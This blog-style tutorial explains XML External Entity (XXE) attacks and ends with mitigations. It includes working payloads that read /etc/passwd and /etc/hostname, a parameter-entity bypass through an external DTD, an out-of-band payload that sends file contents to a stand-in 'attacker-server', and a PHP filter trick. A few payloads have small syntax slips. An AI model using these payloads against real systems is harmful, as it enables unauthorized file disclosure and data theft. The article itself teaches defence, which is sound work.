Traps in Processing XML Files: Navigating the Dangers of XXE Vulnerabilities

T

XML External Entity (XXE) attacks represent one of the most critical security vulnerabilities affecting applications that parse XML files. This article delves into the intricacies of XXE, offering insights into its exploitation, the challenges of securing XML processing, and preventative measures.

XXE vulnerabilities enable attackers to interfere with an application’s process of handling XML data. This could potentially allow unauthorized access to the file system, enable server-side request forgery (SSRF), or manipulate server responses. Understanding the different methods of exploitation is key to defending against these attacks.

Attack Variants and Exploitation Examples

1. Overwriting Values in Tag Content

Attack Mechanics: Assuming an XML document utilizes the text of an element within a response, an attacker can overwrite this value with data from an external entity. This method is often straightforward but requires that the response reflects the manipulated element’s content.

Example:

<!DOCTYPE data [
<!ENTITY s SYSTEM "etc/passwd">
]>
<data>
  <comment>
    <id>1123&s;</id>
  </comment>
</data>

Response sample:

<response>
  Comment id=12345678 root:x:0:0:root:/root:/bin/bash...
  completed successfully!
</response>

In this scenario, the parser processes the &s; entity and replaces it with the contents of the /etc/passwd file, which are then echoed back in the application’s response.

2. Assigning Values at Tag Attribute

Attack Mechanics: Similar to tag content manipulation but involves attributes. The complexity arises because XML specifications often block external entity references within attributes to prevent SSRF and other attacks. However, attackers can sometimes bypass this restriction using more sophisticated DTD (Document Type Definitions) declarations.

<!DOCTYPE data [
<!ENTITY s SYSTEM "etc/passwd">
]>
<data>
  <comment id="1123&s;">
  </comment>
</data>

Continuing from the previous example where the ‘id’ attribute is manipulated, it initially seems that this shouldn’t significantly change the behavior of the element in an ‘commnet’ tag. However, the XML specification prohibits the placement of external entity references within an attribute, which would cause the attack to fail if attempted directly. The error returned by the parser might resemble: “The external entity reference is not permitted in an attribute value.”

A potential solution would be to use a parameter entity, which in turn defines a classic entity containing the file content, for example:

<!DOCTYPE x [
<!ENTITY % file SYSTEM "/etc/passwd">
<!ENTITY % x "<!ENTITY s '%file;'>">
%x;
]>

In this example, the parameter entity %file; contains the content of the file we want to read, while the parameter entity %x; defines the classic entity &s;, which effectively contains the file content of /etc/passwd, although it itself is not an external entity. In practice, however, this leads to another parser error: “The parameter entity reference ‘%file;’ cannot occur within markup in the internal subset of the DTD.”

It turns out that it is not possible to reference a parameter entity within another parameter entity. Nevertheless, the XML standard provides an unexpected loophole: by moving the definition of the entity %x; to an external file, the parameter entity can contain references to other parameter entities.

<!DOCTYPE data [
<!ENTITY % file SYSTEM "/etc/passwd">
<!ENTITY % external SYSTEM "https://server-attack/example.xml">
%external;
%x;
]>
<data>
  <comment id="1123&s;">
  </comment>
</data>

Where files content of https://server-attack/example.xml is:

<!ENTITY % x "<!ENTITY s '%file;'>">

This example demonstrates an indirect method where an external DTD is used to define entities that are then referenced within attributes.

In the given example, four entities have been defined in total. Here’s a breakdown of each:

  1. Entity %file; contains the content of the file /etc/passwd.
  2. Entity %external; loads the definition of another entity from an external file.
  3. Entity %x; defines a classic entity &s;, which retrieves content effectively making the /etc/passwd content accessible indirectly through external entities without causing the XML parser to display an error.

3. Lack of Value Rewriting in Responses

Attack Mechanics: Not all server responses involve rewriting input data from the XML. When direct feedback of manipulated data is absent, attackers may instead leverage server-side functionalities or error messages to infer information.

Example:

<!DOCTYPE data [
<!ENTITY % file SYSTEM "/etc/hostname">
<!ENTITY % external SYSTEM "https://attacker-server/example.xml">
%external;
%x; %x2;
]>
<data>
  <comment id="1123&s;">
  </comment>
</data>

Where the content of the file at https://attacker-server/example.xml is:

<!ENTITY % x ‘<!ENTITY &#x25; x2 “https://attacker-server/example.xml?file=%file;”>’>

This example explains how an attacker might exploit external entities to extract or use data stored on a server in a way that circumvents traditional security measures by using nested and external entities. This method showcases how complex interactions of entities can lead to information disclosure vulnerabilities in systems that process XML data. 

In the given example, four entities have been defined. Here’s an explanation of each:

  1. Entity %file; contains the content of the file /etc/hostname.
  2. Entity %external; loads the definition of another entity from an external file.
  3. Entity %x; is a parameter entity in which the malicious entity %x2; is defined, designed such that the URL address will contain the content of the %file, which is content of  /etc/hostname.

Even if the server response only indicates success or failure without reflecting any input data, the mere processing of the XML document can reveal information through error logs, network calls, or side effects observed by an attacker.

Language-Specific Features

Different programming languages have specific features that can sometimes simplify the exploitation of vulnerabilities. Here are two examples:

  1. In Java: Instead of specifying a file name (like /etc/passwd), you can specify a directory name (like /etc). This will list the contents of that directory, which is very useful for discovering paths to configuration files of applications.
  2. In PHP: There exists a special type of URL that starts with php://, which allows for reading binary files via XXE by converting the file into Base64. An example URL would be: php://filter/convert.base64-encode/resource=/path/to/file.

All previously described XML vulnerabilities result de facto from the same characteristics of XML libraries. It’s important to be aware that this is not the end, as the introduction of new or different data formats based on XML, may introduce new vulnerabilities.

Mitigating XXE Vulnerabilities

Prevention of XXE attacks revolves around securing XML parsers and implementing proper input handling:

  • Disable External Entity Loading: Configuring XML parsers to disallow loading of external entities significantly reduces the risk.
  • Whitelist Safe Entities: If external entities are necessary, strictly whitelist those that are safe to use.
  • Security Hardening of XML Parsers: Use secure parsing options provided by most modern XML parsers, such as explicitly disabling DTDs or using APIs that inherently avoid these issues.

Thank you for your attentions. If you are interested in similar content, then sign up to my newsletter:

architecture AWS cluster cyber-security devops devops-basics docker elasticsearch flask geo high availability java machine learning opensearch php programming languages python recommendation systems search systems spring boot symfony